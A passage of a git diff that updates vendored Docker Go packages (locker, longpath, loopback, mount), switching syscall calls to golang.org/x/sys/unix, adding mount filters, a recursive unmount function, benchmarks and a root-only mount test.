-	return
-}
diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md
index e84a815cc5..ce787aefb3 100644
--- a/vendor/github.com/docker/docker/pkg/locker/README.md
+++ b/vendor/github.com/docker/docker/pkg/locker/README.md
@@ -4,7 +4,7 @@ Locker
 locker provides a mechanism for creating finer-grained locking to help
 free up more global locks to handle other tasks.
 
-The implementation looks close to a sync.Mutex, however the user must provide a
+The implementation looks close to a sync.Mutex, however, the user must provide a
 reference to use to refer to the underlying lock when locking and unlocking,
 and unlock may generate an error.
 
@@ -35,7 +35,7 @@ type important struct {
 func (i *important) Get(name string) interface{} {
 	i.locks.Lock(name)
 	defer i.locks.Unlock(name)
-	return data[name]
+	return i.data[name]
 }
 
 func (i *important) Create(name string, data interface{}) {
@@ -44,9 +44,9 @@ func (i *important) Create(name string, data interface{}) {
 
 	i.createImportant(data)
 
-	s.mu.Lock()
+	i.mu.Lock()
 	i.data[name] = data
-	s.mu.Unlock()
+	i.mu.Unlock()
 }
 
 func (i *important) createImportant(data interface{}) {
@@ -59,7 +59,7 @@ function (or before doing anything with the underlying state), this ensures any
 other function that is dealing with the same name will block.
 
 When needing to modify the underlying data, use the global lock to ensure nothing
-else is modfying it at the same time.
+else is modifying it at the same time.
 Since name lock is already in place, no reads will occur while the modification
 is being performed.
 
diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go
index 0b22ddfab8..dbd47fc465 100644
--- a/vendor/github.com/docker/docker/pkg/locker/locker.go
+++ b/vendor/github.com/docker/docker/pkg/locker/locker.go
@@ -11,7 +11,7 @@ created.
 Lock references are automatically cleaned up on `Unlock` if nothing else is
 waiting for the lock.
 */
-package locker
+package locker // import "github.com/docker/docker/pkg/locker"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go
index 5a297dd47b..2b0a8a55d6 100644
--- a/vendor/github.com/docker/docker/pkg/locker/locker_test.go
+++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go
@@ -1,6 +1,8 @@
-package locker
+package locker // import "github.com/docker/docker/pkg/locker"
 
 import (
+	"math/rand"
+	"strconv"
 	"sync"
 	"testing"
 	"time"
@@ -122,3 +124,38 @@ func TestLockerConcurrency(t *testing.T) {
 		t.Fatalf("lock should not exist: %v", ctr)
 	}
 }
+
+func BenchmarkLocker(b *testing.B) {
+	l := New()
+	for i := 0; i < b.N; i++ {
+		l.Lock("test")
+		l.Unlock("test")
+	}
+}
+
+func BenchmarkLockerParallel(b *testing.B) {
+	l := New()
+	b.SetParallelism(128)
+	b.RunParallel(func(pb *testing.PB) {
+		for pb.Next() {
+			l.Lock("test")
+			l.Unlock("test")
+		}
+	})
+}
+
+func BenchmarkLockerMoreKeys(b *testing.B) {
+	l := New()
+	var keys []string
+	for i := 0; i < 64; i++ {
+		keys = append(keys, strconv.Itoa(i))
+	}
+	b.SetParallelism(128)
+	b.RunParallel(func(pb *testing.PB) {
+		for pb.Next() {
+			k := keys[rand.Intn(len(keys))]
+			l.Lock(k)
+			l.Unlock(k)
+		}
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go
index 9b15bfff4c..4177affba2 100644
--- a/vendor/github.com/docker/docker/pkg/longpath/longpath.go
+++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go
@@ -2,7 +2,7 @@
 // in Windows, which are expected to be prepended with `\\?\` and followed by either
 // a drive letter, a UNC server\share, or a volume identifier.
 
-package longpath
+package longpath // import "github.com/docker/docker/pkg/longpath"
 
 import (
 	"strings"
diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
index 01865eff09..2bcd008e10 100644
--- a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
+++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
@@ -1,4 +1,4 @@
-package longpath
+package longpath // import "github.com/docker/docker/pkg/longpath"
 
 import (
 	"strings"
diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
index 971f45eb48..94feb8fc7d 100644
--- a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
+++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go
@@ -1,14 +1,14 @@
-// +build linux
+// +build linux,cgo
 
-package loopback
+package loopback // import "github.com/docker/docker/pkg/loopback"
 
 import (
 	"errors"
 	"fmt"
 	"os"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 // Loopback related errors
@@ -69,7 +69,7 @@ func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.Fil
 			loopFile.Close()
 
 			// If the error is EBUSY, then try the next loopback
-			if err != syscall.EBUSY {
+			if err != unix.EBUSY {
 				logrus.Errorf("Cannot set up loopback device %s: %s", target, err)
 				return nil, ErrAttachLoopbackDevice
 			}
diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go
index 0714eb5f87..612fd00abe 100644
--- a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go
+++ b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go
@@ -1,36 +1,34 @@
-// +build linux
+// +build linux,cgo
 
-package loopback
+package loopback // import "github.com/docker/docker/pkg/loopback"
 
 import (
-	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 func ioctlLoopCtlGetFree(fd uintptr) (int, error) {
-	index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0)
-	if err != 0 {
+	index, err := unix.IoctlGetInt(int(fd), LoopCtlGetFree)
+	if err != nil {
 		return 0, err
 	}
-	return int(index), nil
+	return index, nil
 }
 
 func ioctlLoopSetFd(loopFd, sparseFd uintptr) error {
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 {
-		return err
-	}
-	return nil
+	return unix.IoctlSetInt(int(loopFd), LoopSetFd, int(sparseFd))
 }
 
 func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error {
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
 		return err
 	}
 	return nil
 }
 
 func ioctlLoopClrFd(loopFd uintptr) error {
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 {
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 {
 		return err
 	}
 	return nil
@@ -39,15 +37,12 @@ func ioctlLoopClrFd(loopFd uintptr) error {
 func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) {
 	loopInfo := &loopInfo64{}
 
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 {
 		return nil, err
 	}
 	return loopInfo, nil
 }
 
 func ioctlLoopSetCapacity(loopFd uintptr, value int) error {
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 {
-		return err
-	}
-	return nil
+	return unix.IoctlSetInt(int(loopFd), LoopSetCapacity, value)
 }
diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
index e1100ce156..7206bfb950 100644
--- a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
+++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go
@@ -1,6 +1,6 @@
-// +build linux
+// +build linux,cgo
 
-package loopback
+package loopback // import "github.com/docker/docker/pkg/loopback"
 
 /*
 #include <linux/loop.h> // FIXME: present only for defines, maybe we can remove it?
diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go
index bc0479284c..086655bc1a 100644
--- a/vendor/github.com/docker/docker/pkg/loopback/loopback.go
+++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go
@@ -1,13 +1,13 @@
-// +build linux
+// +build linux,cgo
 
-package loopback
+package loopback // import "github.com/docker/docker/pkg/loopback"
 
 import (
 	"fmt"
 	"os"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) {
@@ -31,12 +31,13 @@ func SetCapacity(file *os.File) error {
 // FindLoopDeviceFor returns a loopback device file for the specified file which
 // is backing file of a loop back device.
 func FindLoopDeviceFor(file *os.File) *os.File {
-	stat, err := file.Stat()
+	var stat unix.Stat_t
+	err := unix.Stat(file.Name(), &stat)
 	if err != nil {
 		return nil
 	}
-	targetInode := stat.Sys().(*syscall.Stat_t).Ino
-	targetDevice := stat.Sys().(*syscall.Stat_t).Dev
+	targetInode := stat.Ino
+	targetDevice := stat.Dev
 
 	for i := 0; true; i++ {
 		path := fmt.Sprintf("/dev/loop%d", i)
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go
index 607dbed43a..272363b685 100644
--- a/vendor/github.com/docker/docker/pkg/mount/flags.go
+++ b/vendor/github.com/docker/docker/pkg/mount/flags.go
@@ -1,4 +1,4 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
index f166cb2f77..ef35ef9059 100644
--- a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go
@@ -1,6 +1,6 @@
 // +build freebsd,cgo
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 /*
 #include <sys/mount.h>
@@ -45,4 +45,5 @@ const (
 	RELATIME    = 0
 	REMOUNT     = 0
 	STRICTATIME = 0
+	mntDetach   = 0
 )
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go
index dc696dce90..a1b199a31a 100644
--- a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go
@@ -1,85 +1,87 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
-	"syscall"
+	"golang.org/x/sys/unix"
 )
 
 const (
 	// RDONLY will mount the file system read-only.
-	RDONLY = syscall.MS_RDONLY
+	RDONLY = unix.MS_RDONLY
 
 	// NOSUID will not allow set-user-identifier or set-group-identifier bits to
 	// take effect.
-	NOSUID = syscall.MS_NOSUID
+	NOSUID = unix.MS_NOSUID
 
 	// NODEV will not interpret character or block special devices on the file
 	// system.
-	NODEV = syscall.MS_NODEV
+	NODEV = unix.MS_NODEV
 
 	// NOEXEC will not allow execution of any binaries on the mounted file system.
-	NOEXEC = syscall.MS_NOEXEC
+	NOEXEC = unix.MS_NOEXEC
 
 	// SYNCHRONOUS will allow I/O to the file system to be done synchronously.
-	SYNCHRONOUS = syscall.MS_SYNCHRONOUS
+	SYNCHRONOUS = unix.MS_SYNCHRONOUS
 
 	// DIRSYNC will force all directory updates within the file system to be done
 	// synchronously. This affects the following system calls: create, link,
 	// unlink, symlink, mkdir, rmdir, mknod and rename.
-	DIRSYNC = syscall.MS_DIRSYNC
+	DIRSYNC = unix.MS_DIRSYNC
 
 	// REMOUNT will attempt to remount an already-mounted file system. This is
 	// commonly used to change the mount flags for a file system, especially to
 	// make a readonly file system writeable. It does not change device or mount
 	// point.
-	REMOUNT = syscall.MS_REMOUNT
+	REMOUNT = unix.MS_REMOUNT
 
 	// MANDLOCK will force mandatory locks on a filesystem.
-	MANDLOCK = syscall.MS_MANDLOCK
+	MANDLOCK = unix.MS_MANDLOCK
 
 	// NOATIME will not update the file access time when reading from a file.
-	NOATIME = syscall.MS_NOATIME
+	NOATIME = unix.MS_NOATIME
 
 	// NODIRATIME will not update the directory access time.
-	NODIRATIME = syscall.MS_NODIRATIME
+	NODIRATIME = unix.MS_NODIRATIME
 
 	// BIND remounts a subtree somewhere else.
-	BIND = syscall.MS_BIND
+	BIND = unix.MS_BIND
 
 	// RBIND remounts a subtree and all possible submounts somewhere else.
-	RBIND = syscall.MS_BIND | syscall.MS_REC
+	RBIND = unix.MS_BIND | unix.MS_REC
 
 	// UNBINDABLE creates a mount which cannot be cloned through a bind operation.
-	UNBINDABLE = syscall.MS_UNBINDABLE
+	UNBINDABLE = unix.MS_UNBINDABLE
 
 	// RUNBINDABLE marks the entire mount tree as UNBINDABLE.
-	RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC
+	RUNBINDABLE = unix.MS_UNBINDABLE | unix.MS_REC
 
 	// PRIVATE creates a mount which carries no propagation abilities.
-	PRIVATE = syscall.MS_PRIVATE
+	PRIVATE = unix.MS_PRIVATE
 
 	// RPRIVATE marks the entire mount tree as PRIVATE.
-	RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC
+	RPRIVATE = unix.MS_PRIVATE | unix.MS_REC
 
 	// SLAVE creates a mount which receives propagation from its master, but not
 	// vice versa.
-	SLAVE = syscall.MS_SLAVE
+	SLAVE = unix.MS_SLAVE
 
 	// RSLAVE marks the entire mount tree as SLAVE.
-	RSLAVE = syscall.MS_SLAVE | syscall.MS_REC
+	RSLAVE = unix.MS_SLAVE | unix.MS_REC
 
 	// SHARED creates a mount which provides the ability to create mirrors of
 	// that mount such that mounts and unmounts within any of the mirrors
 	// propagate to the other mirrors.
-	SHARED = syscall.MS_SHARED
+	SHARED = unix.MS_SHARED
 
 	// RSHARED marks the entire mount tree as SHARED.
-	RSHARED = syscall.MS_SHARED | syscall.MS_REC
+	RSHARED = unix.MS_SHARED | unix.MS_REC
 
 	// RELATIME updates inode access times relative to modify or change time.
-	RELATIME = syscall.MS_RELATIME
+	RELATIME = unix.MS_RELATIME
 
 	// STRICTATIME allows to explicitly request full atime updates.  This makes
 	// it possible for the kernel to default to relatime or noatime but still
 	// allow userspace to override it.
-	STRICTATIME = syscall.MS_STRICTATIME
+	STRICTATIME = unix.MS_STRICTATIME
+
+	mntDetach = unix.MNT_DETACH
 )
diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
index 5564f7b3cd..cc6c475908 100644
--- a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!freebsd freebsd,!cgo solaris,!cgo
+// +build !linux,!freebsd freebsd,!cgo
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 // These flags are unsupported.
 const (
@@ -27,4 +27,5 @@ const (
 	STRICTATIME = 0
 	SYNCHRONOUS = 0
 	RDONLY      = 0
+	mntDetach   = 0
 )
diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go
index 66ac4bf472..874aff6545 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mount.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mount.go
@@ -1,29 +1,66 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
-	"time"
+	"sort"
+	"strings"
+	"syscall"
+
+	"github.com/sirupsen/logrus"
 )
 
-// GetMounts retrieves a list of mounts for the current running process.
-func GetMounts() ([]*Info, error) {
-	return parseMountTable()
+// FilterFunc is a type defining a callback function
+// to filter out unwanted entries. It takes a pointer
+// to an Info struct (not fully populated, currently
+// only Mountpoint is filled in), and returns two booleans:
+//  - skip: true if the entry should be skipped
+//  - stop: true if parsing should be stopped after the entry
+type FilterFunc func(*Info) (skip, stop bool)
+
+// PrefixFilter discards all entries whose mount points
+// do not start with a prefix specified
+func PrefixFilter(prefix string) FilterFunc {
+	return func(m *Info) (bool, bool) {
+		skip := !strings.HasPrefix(m.Mountpoint, prefix)
+		return skip, false
+	}
+}
+
+// SingleEntryFilter looks for a specific entry
+func SingleEntryFilter(mp string) FilterFunc {
+	return func(m *Info) (bool, bool) {
+		if m.Mountpoint == mp {
+			return false, true // don't skip, stop now
+		}
+		return true, false // skip, keep going
+	}
+}
+
+// ParentsFilter returns all entries whose mount points
+// can be parents of a path specified, discarding others.
+// For example, given `/var/lib/docker/something`, entries
+// like `/var/lib/docker`, `/var` and `/` are returned.
+func ParentsFilter(path string) FilterFunc {
+	return func(m *Info) (bool, bool) {
+		skip := !strings.HasPrefix(path, m.Mountpoint)
+		return skip, false
+	}
+}
+
+// GetMounts retrieves a list of mounts for the current running process,
+// with an optional filter applied (use nil for no filter).
+func GetMounts(f FilterFunc) ([]*Info, error) {
+	return parseMountTable(f)
 }
 
 // Mounted determines if a specified mountpoint has been mounted.
-// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab.
+// On Linux it looks at /proc/self/mountinfo.
 func Mounted(mountpoint string) (bool, error) {
-	entries, err := parseMountTable()
+	entries, err := GetMounts(SingleEntryFilter(mountpoint))
 	if err != nil {
 		return false, err
 	}
 
-	// Search the table for the mountpoint
-	for _, e := range entries {
-		if e.Mountpoint == mountpoint {
-			return true, nil
-		}
-	}
-	return false, nil
+	return len(entries) > 0, nil
 }
 
 // Mount will mount filesystem according to the specified configuration, on the
@@ -46,29 +83,59 @@ func Mount(device, target, mType, options string) error {
 // flags.go for supported option flags.
 func ForceMount(device, target, mType, options string) error {
 	flag, data := parseOptions(options)
-	if err := mount(device, target, mType, uintptr(flag), data); err != nil {
-		return err
-	}
-	return nil
+	return mount(device, target, mType, uintptr(flag), data)
 }
 
-// Unmount will unmount the target filesystem, so long as it is mounted.
+// Unmount lazily unmounts a filesystem on supported platforms, otherwise
+// does a normal unmount.
 func Unmount(target string) error {
-	if mounted, err := Mounted(target); err != nil || !mounted {
-		return err
+	err := unmount(target, mntDetach)
+	if err == syscall.EINVAL {
+		// ignore "not mounted" error
+		err = nil
 	}
-	return ForceUnmount(target)
+	return err
 }
 
-// ForceUnmount will force an unmount of the target filesystem, regardless if
-// it is mounted or not.
-func ForceUnmount(target string) (err error) {
-	// Simple retry logic for unmount
-	for i := 0; i < 10; i++ {
-		if err = unmount(target, 0); err == nil {
-			return nil
+// RecursiveUnmount unmounts the target and all mounts underneath, starting with
+// the deepsest mount first.
+func RecursiveUnmount(target string) error {
+	mounts, err := parseMountTable(PrefixFilter(target))
+	if err != nil {
+		return err
+	}
+
+	// Make the deepest mount be first
+	sort.Slice(mounts, func(i, j int) bool {
+		return len(mounts[i].Mountpoint) > len(mounts[j].Mountpoint)
+	})
+
+	for i, m := range mounts {
+		logrus.Debugf("Trying to unmount %s", m.Mountpoint)
+		err = unmount(m.Mountpoint, mntDetach)
+		if err != nil {
+			// If the error is EINVAL either this whole package is wrong (invalid flags passed to unmount(2)) or this is
+			// not a mountpoint (which is ok in this case).
+			// Meanwhile calling `Mounted()` is very expensive.
+			//
+			// We've purposefully used `syscall.EINVAL` here instead of `unix.EINVAL` to avoid platform branching
+			// Since `EINVAL` is defined for both Windows and Linux in the `syscall` package (and other platforms),
+			//   this is nicer than defining a custom value that we can refer to in each platform file.
+			if err == syscall.EINVAL {
+				continue
+			}
+			if i == len(mounts)-1 {
+				if mounted, e := Mounted(m.Mountpoint); e != nil || mounted {
+					return err
+				}
+				continue
+			}
+			// This is some submount, we can ignore this error for now, the final unmount will fail if this is a real problem
+			logrus.WithError(err).Warnf("Failed to unmount submount %s", m.Mountpoint)
+			continue
 		}
-		time.Sleep(100 * time.Millisecond)
+
+		logrus.Debugf("Unmounted %s", m.Mountpoint)
 	}
-	return
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
index 253aff3b8e..befff9d50c 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go
@@ -1,6 +1,6 @@
-// +build !windows,!solaris
+// +build !windows
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"os"
@@ -25,6 +25,10 @@ func TestMountOptionsParsing(t *testing.T) {
 }
 
 func TestMounted(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -76,6 +80,10 @@ func TestMounted(t *testing.T) {
 }
 
 func TestMountReadonly(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -121,7 +129,7 @@ func TestMountReadonly(t *testing.T) {
 }
 
 func TestGetMounts(t *testing.T) {
-	mounts, err := GetMounts()
+	mounts, err := GetMounts(nil)
 	if err != nil {
 		t.Fatal(err)
 	}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
index bb870e6f59..b6ab83a230 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go
@@ -1,4 +1,4 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 /*
 #include <errno.h>
@@ -13,8 +13,9 @@ import "C"
 import (
 	"fmt"
 	"strings"
-	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 func allocateIOVecs(options []string) []C.struct_iovec {
@@ -55,5 +56,5 @@ func mount(device, target, mType string, flag uintptr, data string) error {
 }
 
 func unmount(target string, flag int) error {
-	return syscall.Unmount(target, flag)
+	return unix.Unmount(target, flag)
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
index dd4280c777..631daf10a5 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go
@@ -1,21 +1,57 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
-	"syscall"
+	"golang.org/x/sys/unix"
 )
 
-func mount(device, target, mType string, flag uintptr, data string) error {
-	if err := syscall.Mount(device, target, mType, flag, data); err != nil {
-		return err
+const (
+	// ptypes is the set propagation types.
+	ptypes = unix.MS_SHARED | unix.MS_PRIVATE | unix.MS_SLAVE | unix.MS_UNBINDABLE
+
+	// pflags is the full set valid flags for a change propagation call.
+	pflags = ptypes | unix.MS_REC | unix.MS_SILENT
+
+	// broflags is the combination of bind and read only
+	broflags = unix.MS_BIND | unix.MS_RDONLY
+)
+
+// isremount returns true if either device name or flags identify a remount request, false otherwise.
+func isremount(device string, flags uintptr) bool {
+	switch {
+	// We treat device "" and "none" as a remount request to provide compatibility with
+	// requests that don't explicitly set MS_REMOUNT such as those manipulating bind mounts.
+	case flags&unix.MS_REMOUNT != 0, device == "", device == "none":
+		return true
+	default:
+		return false
+	}
+}
+
+func mount(device, target, mType string, flags uintptr, data string) error {
+	oflags := flags &^ ptypes
+	if !isremount(device, flags) || data != "" {
+		// Initial call applying all non-propagation flags for mount
+		// or remount with changed data
+		if err := unix.Mount(device, target, mType, oflags, data); err != nil {
+			return err
+		}
 	}
 
-	// If we have a bind mount or remount, remount...
-	if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY {
-		return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data)
+	if flags&ptypes != 0 {
+		// Change the propagation type.
+		if err := unix.Mount("", target, "", flags&pflags, ""); err != nil {
+			return err
+		}
 	}
+
+	if oflags&broflags == broflags {
+		// Remount the bind to apply read only.
+		return unix.Mount("", target, "", oflags|unix.MS_REMOUNT, "")
+	}
+
 	return nil
 }
 
 func unmount(target string, flag int) error {
-	return syscall.Unmount(target, flag)
+	return unix.Unmount(target, flag)
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go
new file mode 100644
index 0000000000..336f3d5cdc
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go
@@ -0,0 +1,228 @@
+// +build linux
+
+package mount // import "github.com/docker/docker/pkg/mount"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+)
+
+func TestMount(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
+	source, err := ioutil.TempDir("", "mount-test-source-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(source)
+
+	// Ensure we have a known start point by mounting tmpfs with given options
+	if err := Mount("tmpfs", source, "tmpfs", "private"); err != nil {
+		t.Fatal(err)
+	}
+	defer ensureUnmount(t, source)
+	validateMount(t, source, "", "", "")
+	if t.Failed() {
+		t.FailNow()
+	}
+
+	target, err := ioutil.TempDir("", "mount-test-target-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(target)
+
+	tests := []struct {
+		source           string
+		ftype            string
+		options          string
+		expectedOpts     string
+		expectedOptional string
+		expectedVFS      string
+	}{
+		// No options
+		{"tmpfs", "tmpfs", "", "", "", ""},
+		// Default rw / ro test
+		{source, "", "bind", "", "", ""},
+		{source, "", "bind,private", "", "", ""},
+		{source, "", "bind,shared", "", "shared", ""},
+		{source, "", "bind,slave", "", "master", ""},
+		{source, "", "bind,unbindable", "", "unbindable", ""},
+		// Read Write tests
+		{source, "", "bind,rw", "rw", "", ""},
+		{source, "", "bind,rw,private", "rw", "", ""},
+		{source, "", "bind,rw,shared", "rw", "shared", ""},
+		{source, "", "bind,rw,slave", "rw", "master", ""},
+		{source, "", "bind,rw,unbindable", "rw", "unbindable", ""},
+		// Read Only tests
+		{source, "", "bind,ro", "ro", "", ""},
+		{source, "", "bind,ro,private", "ro", "", ""},
+		{source, "", "bind,ro,shared", "ro", "shared", ""},
+		{source, "", "bind,ro,slave", "ro", "master", ""},
+		{source, "", "bind,ro,unbindable", "ro", "unbindable", ""},
+		// Remount tests to change per filesystem options
+		{"", "", "remount,size=128k", "rw", "", "rw,size=128k"},
+		{"", "", "remount,ro,size=128k", "ro", "", "ro,size=128k"},
+	}
+
+	for _, tc := range tests {
+		ftype, options := tc.ftype, tc.options
+		if tc.ftype == "" {
+			ftype = "none"
+		}
+		if tc.options == "" {
+			options = "none"
+		}
+
+		t.Run(fmt.Sprintf("%v-%v", ftype, options), func(t *testing.T) {
+			if strings.Contains(tc.options, "slave") {
+				// Slave requires a shared source
+				if err := MakeShared(source); err != nil {
+					t.Fatal(err)
+				}
+				defer func() {
+					if err := MakePrivate(source); err != nil {
+						t.Fatal(err)
+					}
+				}()
+			}
+			if strings.Contains(tc.options, "remount") {
+				// create a new mount to remount first
+				if err := Mount("tmpfs", target, "tmpfs", ""); err != nil {
+					t.Fatal(err)
+				}
+			}
+			if err := Mount(tc.source, target, tc.ftype, tc.options); err != nil {
+				t.Fatal(err)
+			}
+			defer ensureUnmount(t, target)
+			validateMount(t, target, tc.expectedOpts, tc.expectedOptional, tc.expectedVFS)
+		})
+	}
+}
+
+// ensureUnmount umounts mnt checking for errors
+func ensureUnmount(t *testing.T, mnt string) {
+	if err := Unmount(mnt); err != nil {
+		t.Error(err)
+	}
+}
+
+// validateMount checks that mnt has the given options
+func validateMount(t *testing.T, mnt string, opts, optional, vfs string) {
+	info, err := GetMounts(nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	wantedOpts := make(map[string]struct{})
+	if opts != "" {
+		for _, opt := range strings.Split(opts, ",") {
+			wantedOpts[opt] = struct{}{}
+		}
+	}
+
+	wantedOptional := make(map[string]struct{})
+	if optional != "" {
+		for _, opt := range strings.Split(optional, ",") {
+			wantedOptional[opt] = struct{}{}
+		}
+	}
+
+	wantedVFS := make(map[string]struct{})
+	if vfs != "" {
+		for _, opt := range strings.Split(vfs, ",") {
+			wantedVFS[opt] = struct{}{}
+		}
+	}
+
+	mnts := make(map[int]*Info, len(info))
+	for _, mi := range info {
+		mnts[mi.ID] = mi
+	}
+
+	for _, mi := range info {
+		if mi.Mountpoint != mnt {
+			continue
+		}
+
+		// Use parent info as the defaults
+		p := mnts[mi.Parent]
+		pOpts := make(map[string]struct{})
+		if p.Opts != "" {
+			for _, opt := range strings.Split(p.Opts, ",") {
+				pOpts[clean(opt)] = struct{}{}
+			}
+		}
+		pOptional := make(map[string]struct{})
+		if p.Optional != "" {
+			for _, field := range strings.Split(p.Optional, ",") {
+				pOptional[clean(field)] = struct{}{}
+			}
+		}
+
+		// Validate Opts
+		if mi.Opts != "" {
+			for _, opt := range strings.Split(mi.Opts, ",") {
